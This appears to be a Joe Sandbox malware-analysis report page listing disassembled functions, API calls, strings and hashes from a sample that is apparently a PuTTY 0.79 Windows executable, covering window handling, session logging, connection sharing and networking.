Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$Long$DialogEnableItemText$ActiveExecuteParamShell
String ID: %s%s%s%s$About %s$PuTTY$Release 0.79$https://www.chiark.greenend.org.uk/~sgtatham/putty/$open
API String ID: 2657381607-2046452043
Opcode ID: 0c6d72514122a4b2f66a391b590175c5c3f77b20ba9467e876882c285861daaa
Instruction ID: b45f05c2cb4486d5e23124fb0dc160946d0d4b6a0ad19ae800993d45a37c26ef
Opcode Fuzzy Hash: 0c6d72514122a4b2f66a391b590175c5c3f77b20ba9467e876882c285861daaa
Instruction Fuzzy Hash: 4F216DB9A403107FE2207320BC87F6F361DD714706F444C20FA0BE72D2D961AD898AB6

Uniqueness

Uniqueness Score: -1.00%

Function 00C47330 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00C47349
MessageBeep.USER32(00000000), ref: 00C47360
GetTickCount.KERNEL32 ref: 00C47366
GetTickCount.KERNEL32 ref: 00C47376
Beep.KERNEL32(00000320,00000064), ref: 00C4739F
ShowCursor.USER32(00000001), ref: 00C473F6
MessageBoxA.USER32(00000000,00000000,00000030), ref: 00C47433
GetTickCount.KERNEL32 ref: 00C47467

Strings

%s Sound Error, xrefs: 00C4741A
Unable to play sound file%sUsing default sound instead, xrefs: 00C47405

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CountTick$BeepMessage$CursorShow
String ID: %s Sound Error$Unable to play sound file%sUsing default sound instead
API String ID: 3991535243-3498667495
Opcode ID: 8c14bd1e3a5d2d9cbbf7184aacdd49a1ee9042e250f90393267a32458fd0d886
Instruction ID: f07093c70a3d873e6de2af4184cc6e7ab85c3bd13afe3638522866afb429e654
Opcode Fuzzy Hash: 8c14bd1e3a5d2d9cbbf7184aacdd49a1ee9042e250f90393267a32458fd0d886
Instruction Fuzzy Hash: 02519EB89083109BEB20AF24FD85B2A3FE1FB42314F044528E549D63B1D7B58984DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00C4AAD0 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 97windowCOMMON

Download Yara Rule

APIs

IsZoomed.USER32 ref: 00C4AAE5
IsZoomed.USER32 ref: 00C4AB0C
GetWindowLongA.USER32(000000F0), ref: 00C4AB1E
GetWindowLongA.USER32(000000F0), ref: 00C4AB37
SetWindowLongA.USER32(000000F0,00200000), ref: 00C4AB69
GetDesktopWindow.USER32 ref: 00C4ABC0
GetClientRect.USER32(00000000), ref: 00C4ABCA
SetWindowPos.USER32(00000000,00000000,?,?,?,00000020), ref: 00C4ABF1
CheckMenuItem.USER32(00000180,00000008), ref: 00C4AC11
CheckMenuItem.USER32(00000180,00000008), ref: 00C4AC20

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c, xrefs: 00C4AAF4
(, xrefs: 00C4AB8B
IsZoomed(wgs.term_hwnd), xrefs: 00C4AAF9

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$Long$CheckItemMenuZoomed$ClientDesktopRect
String ID: ($/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c$IsZoomed(wgs.term_hwnd)
API String ID: 4021424604-438976342
Opcode ID: 2b21392ace65d576d7dbf5d7f571c8a788bbcbdf2a92aaf41ff0ff1bdbd80c00
Instruction ID: 5184f1cfba1b50a7e88918f43b152319049d9ac2f42566722aa4ff4fc6877df8
Opcode Fuzzy Hash: 2b21392ace65d576d7dbf5d7f571c8a788bbcbdf2a92aaf41ff0ff1bdbd80c00
Instruction Fuzzy Hash: C3314CB8644300AFD714AF24ED4AF1A7BE6FB45710F048918FA56D23B0DB70A844DF66

Uniqueness

Uniqueness Score: -1.00%

Function 00C5FB70 Relevance: 22.7, APIs: 15, Instructions: 197windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00C5FB91
_strlen.LIBCMT ref: 00C5FB9A
_strlen.LIBCMT ref: 00C5FBB7
SetMapMode.GDI32(00000000,00000001), ref: 00C5FBD5
MapDialogRect.USER32(?,00000000), ref: 00C5FC02
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00C5FC13
SelectObject.GDI32(00000000,00000000), ref: 00C5FC1B
_strlen.LIBCMT ref: 00C5FC2F
GetTextExtentExPointA.GDI32(00000000,?,00000000,?,?,?,?), ref: 00C5FC4E
_strlen.LIBCMT ref: 00C5FC79
_strncpy.LIBCMT ref: 00C5FCC2
SelectObject.GDI32(00000000,00000000), ref: 00C5FD89
ReleaseDC.USER32(?,00000000), ref: 00C5FD92

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen$ObjectSelect$DialogExtentMessageModePointRectReleaseSendText_strncpy
String ID:
API String ID: 1808708362-0
Opcode ID: 68e573e42553bafdfc4c7c96b704e6b40b50d2872d9e5fd784c8cdcce8c4aa1f
Instruction ID: 08fb86edf4ff9cf0eb8b9eead3648e8f59372af87238b325da0ba1647e478b53
Opcode Fuzzy Hash: 68e573e42553bafdfc4c7c96b704e6b40b50d2872d9e5fd784c8cdcce8c4aa1f
Instruction Fuzzy Hash: EE618CB5509304AFD3109F20D845B2BB7E9EF88748F08482CFD9987352E775E909CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00CA8240 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 189synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00CCF180: _strlen.LIBCMT ref: 00CCF196

GetLastError.KERNEL32 ref: 00CA83DB

Part of subcall function 00CA7050: GetUserNameA.ADVAPI32(00000000), ref: 00CA7114
Part of subcall function 00CA7050: GetUserNameA.ADVAPI32(00000000), ref: 00CA7140

Part of subcall function 00CCF2E0: CreateMutexA.KERNEL32(?,00000000,?), ref: 00CCF34F
Part of subcall function 00CCF2E0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?), ref: 00CCF35E
Part of subcall function 00CCF2E0: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00CA828B,00000000,?), ref: 00CCF391
Part of subcall function 00CCF2E0: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00CA828B,00000000,?), ref: 00CCF3A0

ReleaseMutex.KERNEL32(00000000), ref: 00CA83CC
CloseHandle.KERNEL32(00000000), ref: 00CA83D3
ReleaseMutex.KERNEL32(00000000), ref: 00CA846D
CloseHandle.KERNEL32(00000000), ref: 00CA8474

Part of subcall function 00CA7050: GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 00CA709E
Part of subcall function 00CA7050: ___from_strstr_to_strchr.LIBCMT ref: 00CA70EE

Strings

%s: %s, xrefs: 00CA830A, 00CA836C
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/sharing.c, xrefs: 00CA83A7
\\.\pipe\putty-connshare, xrefs: 00CA82A1
*logtext || *ds_err || *us_err, xrefs: 00CA83AC
Local\putty-connshare-mutex, xrefs: 00CA8267
Unable to call CryptProtectMemory: %s, xrefs: 00CA83EB
%s.%s.%s, xrefs: 00CA826C, 00CA82A6

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Mutex$CloseFreeHandleLocalNameReleaseUser$AddressCreateErrorLastObjectProcSingleWait___from_strstr_to_strchr_strlen
String ID: %s.%s.%s$%s: %s$*logtext || *ds_err || *us_err$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/sharing.c$Local\putty-connshare-mutex$Unable to call CryptProtectMemory: %s$\\.\pipe\putty-connshare
API String ID: 2618670743-438322010
Opcode ID: 064f89b36077a6f5d266afbd3e9492ae21e6ec615e0ced7e2e61e334a4e3f942
Instruction ID: 3d7886947123d033476861f4cc5fc158282558a54bce0583158c64e07646a323
Opcode Fuzzy Hash: 064f89b36077a6f5d266afbd3e9492ae21e6ec615e0ced7e2e61e334a4e3f942
Instruction Fuzzy Hash: 715139B5904204AFD700AB64EC46E2B36E8EF5971CF094434F90D97263FA35EA18DB63

Uniqueness

Uniqueness Score: -1.00%

Function 00C64DF0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00C896E0: GetLocalTime.KERNEL32(?,?,?,?,00C64BB4,?), ref: 00C896F6

_strftime.LIBCMT ref: 00C64E78

Part of subcall function 00C65600: _strlen.LIBCMT ref: 00C6562D

Strings

Disabled writing, xrefs: 00C64EE3
=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=, xrefs: 00C64E81
%Y.%m.%d %H:%M:%S, xrefs: 00C64E6E
unknown, xrefs: 00C64ED9, 00C64F08
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/logging.c, xrefs: 00C64F4D
Appending, xrefs: 00C64EF3
ctx->state != L_OPENING, xrefs: 00C64F52
Error writing, xrefs: 00C64EE8
%s session log (%s mode) to file: %s, xrefs: 00C64F0A
Writing new, xrefs: 00C64EF8, 00C64F09
SSH raw data, xrefs: 00C64ED4

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: LocalTime_strftime_strlen
String ID: %Y.%m.%d %H:%M:%S$%s session log (%s mode) to file: %s$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/logging.c$=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=$Appending$Disabled writing$Error writing$SSH raw data$Writing new$ctx->state != L_OPENING$unknown
API String ID: 4241967358-576433061
Opcode ID: 52cd1c50941744dc1072a080cd4d1698f4520e4d7327801c12937e11da5db9eb
Instruction ID: 0a93465f50190b12db071ad70cdcb0c9eac9e0995da3ba9d6424b31e60b175fd
Opcode Fuzzy Hash: 52cd1c50941744dc1072a080cd4d1698f4520e4d7327801c12937e11da5db9eb
Instruction Fuzzy Hash: 0241F8B5A043049FD734AB20EC86A6B77E5FB95308F14482CF85E47342EA32A958D762

Uniqueness

Uniqueness Score: -1.00%

Function 00C644D4 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 204comCOMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00C644EC
_strrchr.LIBCMT ref: 00C644FF
CoCreateInstance.OLE32(00D0E988,00000000,00000001,00D0E978,?), ref: 00C645A6
_strcspn.LIBCMT ref: 00C64646
_strcspn.LIBCMT ref: 00C646F5

Strings

appname, xrefs: 00C64633, 00C646E2
Connect to PuTTY session ', xrefs: 00C64613
%.*s%s, xrefs: 00C64518
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/jump-list.c, xrefs: 00C6462E, 00C646DD
j\h, xrefs: 00C644E5
Run %.*s, xrefs: 00C64650, 00C646FF

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strcspn_strrchr$CreateInstance
String ID: %.*s%s$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/jump-list.c$Connect to PuTTY session '$Run %.*s$appname$j\h
API String ID: 3753966584-791214143
Opcode ID: f5a4b46befba313c76066a4d71ca15a9ee9cd75fa366c41385348a0927409886
Instruction ID: 472989923b83c1b90544565984c267a47c4f7d434615ad4d20d1cbdbf5c443f6
Opcode Fuzzy Hash: f5a4b46befba313c76066a4d71ca15a9ee9cd75fa366c41385348a0927409886
Instruction Fuzzy Hash: CD51EBF5A403106FD714EF619C8AF2B77989F95708F04482CF90A97282EB71D909D6B3

Uniqueness

Uniqueness Score: -1.00%

Function 00C74690 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 194libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7BC00: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00C7BC76
Part of subcall function 00C7BC00: RegCloseKey.ADVAPI32(?), ref: 00C7BCBA

GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 00C74739

Part of subcall function 00C74D10: CreateFileA.KERNEL32(00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,00C748A9), ref: 00C74D4B

GetEnvironmentVariableA.KERNEL32(HOMEDRIVE,?,00000104), ref: 00C74803
GetEnvironmentVariableA.KERNEL32(HOMEPATH,?,00000104), ref: 00C74816
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C7487E

Part of subcall function 00C7BE40: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00C746D1,00000000,RandSeedFile), ref: 00C7BE67
Part of subcall function 00C7BE40: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00C7BE9F

Part of subcall function 00C7BCE0: RegCloseKey.ADVAPI32(00000000,00C746DC,00000000), ref: 00C7BCE4

Strings

HOMEPATH, xrefs: 00C74811
HOMEDRIVE, xrefs: 00C747FE
shell32.dll, xrefs: 00C7471D
Software\SimonTatham\PuTTY, xrefs: 00C746AC
RandSeedFile, xrefs: 00C746C6
\PUTTY.RND, xrefs: 00C74772, 00C747B9, 00C74839, 00C7488D
SHGetFolderPathA, xrefs: 00C74733

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CloseCreateEnvironmentQueryValueVariable$AddressDirectoryFileProcWindows
String ID: HOMEDRIVE$HOMEPATH$RandSeedFile$SHGetFolderPathA$Software\SimonTatham\PuTTY$\PUTTY.RND$shell32.dll
API String ID: 1153880102-1528239033
Opcode ID: b477af44d0cdd5748fe71900c266caab43991599485b1e83529686c48f8046c7
Instruction ID: 72ded2b6456daad62c7ded352317214d0337ea85b243d16695af1b4e2f86b835
Opcode Fuzzy Hash: b477af44d0cdd5748fe71900c266caab43991599485b1e83529686c48f8046c7
Instruction Fuzzy Hash: 045135B5B843446BF62876347C47B7B36898B61744F184424FD5ED73C2FBA0AA04C263

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2BD0 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 315COMMON

Download Yara Rule

Strings

port, xrefs: 00CB2CFD
proxyport, xrefs: 00CB2D5D
proxyhost, xrefs: 00CB2D45
host, xrefs: 00CB2CE5
pass, xrefs: 00CB2D2D
user, xrefs: 00CB2D15

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: host$pass$port$proxyhost$proxyport$user
API String ID: 0-3129514663
Opcode ID: 7ba8c044ba9b3890df9c326e318967d73102159fd489133b5fb64b69f29b6744
Instruction ID: 630655ff6f9f8cfa4337a4dc044ffa206e5240f54e20c0de4b69e399377a4bd7
Opcode Fuzzy Hash: 7ba8c044ba9b3890df9c326e318967d73102159fd489133b5fb64b69f29b6744
Instruction Fuzzy Hash: B8A19A71944340BBE7306A21EC43BFB7BA1CF51754F084428FD89962D2E7359E1AE6A3

Uniqueness

Uniqueness Score: -1.00%

Function 00C75A10 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 205networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32(?), ref: 00C75AEC
htonl.WS2_32(00000000), ref: 00C75AF5
socket.WS2_32(00000002,00000002,00000000), ref: 00C75B19
SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,00000000,00C8E36D,00000000), ref: 00C75B26
htonl.WS2_32(?), ref: 00C75BB4
socket.WS2_32(00000002,00000002,00000000), ref: 00C75BDC
SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00C75BE9

Strings

addr->addresses && step.curraddr < addr->naddresses, xrefs: 00C75ADA
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/network.c, xrefs: 00C75A9A, 00C75AD5
family == AF_UNSPEC, xrefs: 00C75A9F

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: htonl$HandleInformationsocket
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/network.c$addr->addresses && step.curraddr < addr->naddresses$family == AF_UNSPEC
API String ID: 626431343-1429985034
Opcode ID: 0e1990c4830c60569e5d9597f58a0344ff1cdf812f5c0b99c370546a7fa9ca03
Instruction ID: 88d0a816e9236feeb3d60c1b4ec7627f3f577222be015ee836889028f17b74f0
Opcode Fuzzy Hash: 0e1990c4830c60569e5d9597f58a0344ff1cdf812f5c0b99c370546a7fa9ca03
Instruction Fuzzy Hash: B351C23AA40B009BE7349F24CC9AB3A33A4AF51730F558229F929DB3D0D7A0DD4496A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C4B400 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 159fileCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000106,?), ref: 00C4B452
GetCurrentProcessId.KERNEL32 ref: 00C4B460
CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00C4B490
GetLastError.KERNEL32 ref: 00C4B4B0
CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00C4B4FB
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C4B532
DeleteFileA.KERNEL32(00000000,?,?,?,00000000), ref: 00C4B541
CloseHandle.KERNEL32(00000000), ref: 00C4B5E6

Strings

%s::/%s.html>main, xrefs: 00C4B572
%s\putty_%lu_%llu.chm, xrefs: 00C4B46E, 00C4B4D9

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: File$Create$CloseCurrentDeleteErrorHandleLastPathProcessTempWrite
String ID: %s::/%s.html>main$%s\putty_%lu_%llu.chm
API String ID: 4085685679-1808412575
Opcode ID: 91a5535c2bef6e1bb68be7579adb58fea9ab158c29c6e349ef76aae1cf815f07
Instruction ID: d2a7e9a0f7ac42236d0b49618896e9543988b85156960579b4b54c0624d2b207
Opcode Fuzzy Hash: 91a5535c2bef6e1bb68be7579adb58fea9ab158c29c6e349ef76aae1cf815f07
Instruction Fuzzy Hash: 874108796403006FE3209B75AC4AFBB77A9EB82714F050524FA19D63D1E7B1AD44CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CA0F80 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 117COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00CA1051

Strings

ost, xrefs: 00CA10AE
Connecting to %s, xrefs: 00CA10A7
len >= 2, xrefs: 00CA1067
Connected to %s, xrefs: 00CA10C8
%s, xrefs: 00CA1041
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/utils/backend_socket_log.c, xrefs: 00CA1062
Connecting to %s port %d, xrefs: 00CA0FE8
te h, xrefs: 00CA10B6
Failed to connect to %s: %s, xrefs: 00CA1002

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID: %s$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/utils/backend_socket_log.c$Connected to %s$Connecting to %s$Connecting to %s port %d$Failed to connect to %s: %s$len >= 2$ost$te h
API String ID: 4218353326-3921011226
Opcode ID: 4627f1e903a1a04c562e4147d8ddde76dcd4292699b2a6573582f78c07e75d50
Instruction ID: 839cdb5568cb107f28015e09066fb6639de3f6b910281d7cecaa9cb154986055
Opcode Fuzzy Hash: 4627f1e903a1a04c562e4147d8ddde76dcd4292699b2a6573582f78c07e75d50
Instruction Fuzzy Hash: 93312BB5A443807BD6306621AC07FEF3AA8DB9B718F0C4418FD8947282E6725994D6B3

Uniqueness

Uniqueness Score: -1.00%

Function 00C46D10 Relevance: 16.7, APIs: 11, Instructions: 181COMMON

Download Yara Rule

APIs

CreatePen.GDI32(00000000,00000000), ref: 00C46DF8
SelectObject.GDI32(00000000), ref: 00C46E05
MoveToEx.GDI32(?,?,00000000), ref: 00C46E18
LineTo.GDI32(00000000,00000001), ref: 00C46E34
SelectObject.GDI32 ref: 00C46E43
CreatePen.GDI32(00000000,00000000), ref: 00C46EA1
SelectObject.GDI32(00000000), ref: 00C46EB4
Polyline.GDI32(?,00000005), ref: 00C46EC5
SelectObject.GDI32(00000000), ref: 00C46ED2
DeleteObject.GDI32(00000000), ref: 00C46ED5
SetPixel.GDI32(?,?), ref: 00C46F78

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Object$Select$Create$DeleteLineMovePixelPolyline
String ID:
API String ID: 1020918164-0
Opcode ID: e50dc164914908cb3f1b505535bca32b7a5347e20d15b1976fba5268fb9b57d7
Instruction ID: 843326ff9ebd4221aa1895948673463dd8b9446728e975d9d2d28a325dd8a3e5
Opcode Fuzzy Hash: e50dc164914908cb3f1b505535bca32b7a5347e20d15b1976fba5268fb9b57d7
Instruction Fuzzy Hash: 6361BE7A904304AFE3108F55ED85B6ABBE9FF86350F094519F9A587360C371AD84CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4CB0 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 468COMMON

Download Yara Rule

Strings

%.*s , xrefs: 00CA514B
